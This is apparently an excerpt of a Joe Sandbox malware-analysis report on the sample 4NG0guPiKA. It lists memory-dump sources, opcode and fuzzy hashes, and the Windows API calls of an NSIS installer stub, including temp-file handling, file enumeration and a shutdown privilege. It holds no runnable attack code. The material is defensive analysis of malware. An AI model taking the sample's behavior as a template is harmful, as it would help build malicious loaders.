                                                                                                            • Instruction Fuzzy Hash: D6016935D01248DFDB448FB5C9086E8BBB5FF8E301F40A469EA05B6264CB325996DBA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c8589915609fa119afa14769840a7555661e99778e06bffd0bb34f3e298b6b29
                                                                                                            • Instruction ID: 899043aaed51e9d2b57a6a081e09b983be6375f27cba0cd04a2f33176a01a049
                                                                                                            • Opcode Fuzzy Hash: c8589915609fa119afa14769840a7555661e99778e06bffd0bb34f3e298b6b29
                                                                                                            • Instruction Fuzzy Hash: 17F08778E01608CFDB04DFA9C8442EDBBF6FB8A301F10A829C404B3260DB369941CB54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 97524aeb458551f1be6f2259cb8e3d6d005c1aacd54495da495d899b7fb54c8d
                                                                                                            • Instruction ID: 0e073626a17bec6bcc2cfee469cc893986ef38a5a6de1d9041bf7763f92f2f22
                                                                                                            • Opcode Fuzzy Hash: 97524aeb458551f1be6f2259cb8e3d6d005c1aacd54495da495d899b7fb54c8d
                                                                                                            • Instruction Fuzzy Hash: 17F028B9F242189FDB10DFA4C841BBF7BB5FB88354F00492AE54697640CB35E409CB92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0933b404a74bdb7f2451df401edde381536188366a1d1ff8e5dd406c0aaec47c
                                                                                                            • Instruction ID: e76609449f8f6e4ab60f9ddb5156b92c28fd7ed95229d1a0300bf4fd2ac0e8a8
                                                                                                            • Opcode Fuzzy Hash: 0933b404a74bdb7f2451df401edde381536188366a1d1ff8e5dd406c0aaec47c
                                                                                                            • Instruction Fuzzy Hash: 9DF0A0613143055BE20472A98855B2F629E9FC5691B154A36E501DA240DEE1EC4607F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c7779dafbba4da8f9a94c73fff1ded65b4fb0d58e9fcb33e754c42f19dcda4df
                                                                                                            • Instruction ID: 569eb738a4e4aa1fdbee1f3d575254b5b70afc7c2a8e6d822d1d39082628c8b1
                                                                                                            • Opcode Fuzzy Hash: c7779dafbba4da8f9a94c73fff1ded65b4fb0d58e9fcb33e754c42f19dcda4df
                                                                                                            • Instruction Fuzzy Hash: E5F0E5613243092BE200627D8811B7B679EDFC56A0F15463AE501EB254DEE5ED4203F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2a3eab610270aa88ab2a6534a918745860d34bf13bd0fec3b58bd04bceb0bd81
                                                                                                            • Instruction ID: 3e0febae4678f27c2f5b9e1b8bafe004874f5d94d85383085fe228b4b0c27e6f
                                                                                                            • Opcode Fuzzy Hash: 2a3eab610270aa88ab2a6534a918745860d34bf13bd0fec3b58bd04bceb0bd81
                                                                                                            • Instruction Fuzzy Hash: 67E09935822F02DBF3402B70ACBC33A7AB5FB0B313B806C00A00E820329B785444CA14
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b90d5870870e0a4fa73aea033ecebb889a7ce5485dd13e23fdc6fb743785af61
                                                                                                            • Instruction ID: e5b83dec97e11c67fbc94cd6f2190907e5f1656323863142212f1afd446b964f
                                                                                                            • Opcode Fuzzy Hash: b90d5870870e0a4fa73aea033ecebb889a7ce5485dd13e23fdc6fb743785af61
                                                                                                            • Instruction Fuzzy Hash: F8E09A319113668ECB029FB4D8040EEBB30EE83310B1242A7D050BB050FB301A5ECB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e1d1f9a8583ed41eb96d4be606b088896bc096a00779944bd49438b835697ae
                                                                                                            • Instruction ID: b03a0496122e7537162badfac2d15440278745f09f77eaa19dca882f27305302
                                                                                                            • Opcode Fuzzy Hash: 4e1d1f9a8583ed41eb96d4be606b088896bc096a00779944bd49438b835697ae
                                                                                                            • Instruction Fuzzy Hash: CCE04630424F02DFE3402F60ACAC2AABB74FB0B307BC42D04E90E420328B3C0400CA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c4aeffc451c94e744aac0e9a87337be88c393f46bfd417fd5a3ef162eca41b8
                                                                                                            • Instruction ID: 6929faecdff88bb0c3ff640ec8fd7f08f2cc4265d985de722acea8d6f6b93f6d
                                                                                                            • Opcode Fuzzy Hash: 0c4aeffc451c94e744aac0e9a87337be88c393f46bfd417fd5a3ef162eca41b8
                                                                                                            • Instruction Fuzzy Hash: CAF03934D05208EFDB54DFB8D5496ACBFF1EB4D305F6091AAC815A3321DB314A55CB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1b1561e9fea3437abaa32de5080eebffd754e4a7e5e280af340263c615bc29ef
                                                                                                            • Instruction ID: d0e7e20e121fe2e207723d5f7250f1c1a305e6ff0b320b955c416e3d133748c1
                                                                                                            • Opcode Fuzzy Hash: 1b1561e9fea3437abaa32de5080eebffd754e4a7e5e280af340263c615bc29ef
                                                                                                            • Instruction Fuzzy Hash: 00E06D34D04308EBDB44DFB8D40869CBBF5AB49305F6080AA8805A3351D7304A41CB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d09b7763e3a96e49158dd27dd2cc88076bceaae595454e7138920b65b9b26073
                                                                                                            • Instruction ID: 87691b3267c9eeaef76ce105dc5fb7e0e8e61bd62bda3e5b8092d2b8c33dc9cc
                                                                                                            • Opcode Fuzzy Hash: d09b7763e3a96e49158dd27dd2cc88076bceaae595454e7138920b65b9b26073
                                                                                                            • Instruction Fuzzy Hash: A9E0C2B1D49386AFC742ABB09811AF9BB749B47201F1490DAC805A32A2E7310E15CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                            • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                            • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                            APIs
                                                                                                            • #17.COMCTL32 ref: 00403379
                                                                                                            • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                              • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                              • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                              • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                            • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                              • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                            • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                            • CharNextW.USER32(00000000,00434000,00000020), ref: 00403402
                                                                                                            • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 0040350B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351C
                                                                                                            • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403528
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353C
                                                                                                            • lstrcatW.KERNEL32(00436800,Low), ref: 00403544
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403555
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355D
                                                                                                            • DeleteFileW.KERNEL32(00436000), ref: 00403571
                                                                                                            • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                            • ExitProcess.KERNEL32 ref: 00403641
                                                                                                            • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364D
                                                                                                            • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403659
                                                                                                            • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403665
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366C
                                                                                                            • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                            • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036DA
                                                                                                            • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                            • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                            • API String ID: 4107622049-1875889550
                                                                                                            • Opcode ID: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                            • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                            • Opcode Fuzzy Hash: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                            • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,00436800,774D2EE0,00434000), ref: 0040579B
                                                                                                            • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,774D2EE0,00434000), ref: 004057E3
                                                                                                            • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,774D2EE0,00434000), ref: 00405806
                                                                                                            • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,774D2EE0,00434000), ref: 0040580C
                                                                                                            • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,774D2EE0,00434000), ref: 0040581C
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                            • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: \*.*
                                                                                                            • API String ID: 2035342205-1173974218
                                                                                                            • Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                            • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                            • Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                            • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$H'3d'3$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                            • API String ID: 0-1641965047
                                                                                                            • Opcode ID: b7be39549f0ddb1ce639471888cab3c82342a848d51dec27d35fe28ec60a8ad4
                                                                                                            • Instruction ID: 3600e76db007edba7ca896d0f8ca7b1ea4e135652ca573b149baf9baf3a4507a
                                                                                                            • Opcode Fuzzy Hash: b7be39549f0ddb1ce639471888cab3c82342a848d51dec27d35fe28ec60a8ad4
                                                                                                            • Instruction Fuzzy Hash: 393280B4E012188FEB64CF65C994B9DBBB2BF89300F1085A9D809BB351DB759E85CF14
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$H'3d'3$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                            • API String ID: 0-1641965047
                                                                                                            • Opcode ID: f260281012b1fc5b6c037f22872bc2aad7c7027320ada2f112bc23254c773822
                                                                                                            • Instruction ID: eed1f64f304a22d3a3f812b32bb79a6cf333a2aea7cc2e8de2553656342387e4
                                                                                                            • Opcode Fuzzy Hash: f260281012b1fc5b6c037f22872bc2aad7c7027320ada2f112bc23254c773822
                                                                                                            • Instruction Fuzzy Hash: 680290B4E002188FEB54CF69C994BDDBBB2BF89300F1081A9D809A7361DB759E85CF15
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$H'3d'3$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                            • API String ID: 0-1641965047
                                                                                                            • Opcode ID: 5254f5be63372326d61be829fade75706b452dc41564403867575004591b56a3
                                                                                                            • Instruction ID: e233a6ca7b2c233696c821cab8ed4634af6774f5b833d89137d43b3422fb93e3
                                                                                                            • Opcode Fuzzy Hash: 5254f5be63372326d61be829fade75706b452dc41564403867575004591b56a3
                                                                                                            • Instruction Fuzzy Hash: 4E0280B4E002188FEB54CF65C994BDDBBB2BF89300F1081A9D809A7365DB759E85CF15
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                            • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                            • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                            • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,774D2EE0,00405792,?,00436800,774D2EE0), ref: 00406238
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622434033.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2622413672.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622466637.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622523193.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000045F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000046C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000003.00000002.2622556769.000000000049F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: WB
                                                                                                            • API String ID: 2295610775-2854515933
                                                                                                            • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                            • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                            • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                            • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: H'3d'3
                                                                                                            • API String ID: 0-2180681280
                                                                                                            • Opcode ID: ee3d461bfb353bd9b4c63d0ed2174d6b0f71496c49f8904a298c5b812000de21
                                                                                                            • Instruction ID: e653e6508f905cb86ccc27f051c29f5b3812f511c3ed9224bf00ad1c7e91b56f
                                                                                                            • Opcode Fuzzy Hash: ee3d461bfb353bd9b4c63d0ed2174d6b0f71496c49f8904a298c5b812000de21
                                                                                                            • Instruction Fuzzy Hash: D5C1AD78E00358CFEB14DFA9C984B9DBBB2BB89300F1081A9D409BB355DB759A81CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d87f4dfdc9ce8be73c605553f5c85a73a7b3b015a4a08c4f4d284aa1b29ebe82
                                                                                                            • Instruction ID: 07cc59ba1542da4a6e100e3c44ebf410ab5f389fdfbee54747e5845487027d67
                                                                                                            • Opcode Fuzzy Hash: d87f4dfdc9ce8be73c605553f5c85a73a7b3b015a4a08c4f4d284aa1b29ebe82
                                                                                                            • Instruction Fuzzy Hash: C3627A74E012688FDB64DF69C884BDDBBB2BB89301F1085EAD409AB355DB359E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
• Opcode ID: fba67b9a7a319ab0cd21f8064e0203159153377a6cd42d0de600a6869172428e
• Instruction ID: 3ac376d039040cb46d1f373e17398a8d6860723f32dd1b10cf9acfde5416b6ad
• Opcode Fuzzy Hash: fba67b9a7a319ab0cd21f8064e0203159153377a6cd42d0de600a6869172428e
• Instruction Fuzzy Hash: 6CC1AE74E00358CFEB14DFA9C994B9DBBB2AB89300F2081A9D409BB355DB359A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0c1d6b8bc0e941758b9db29a1801648a59feb37ec086477cba2f2a2f922d023f
• Instruction ID: e6924ed3e96bfd91f5b8093ffc0eccf5817cbb153b1a46c47e9f186d84abcda8
• Opcode Fuzzy Hash: 0c1d6b8bc0e941758b9db29a1801648a59feb37ec086477cba2f2a2f922d023f
• Instruction Fuzzy Hash: 83C1A074E00358CFEB14DFA9C994B9DBBB2AF89300F1081A9D809BB355DB359A85CF54
Memory Dump Source
• Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
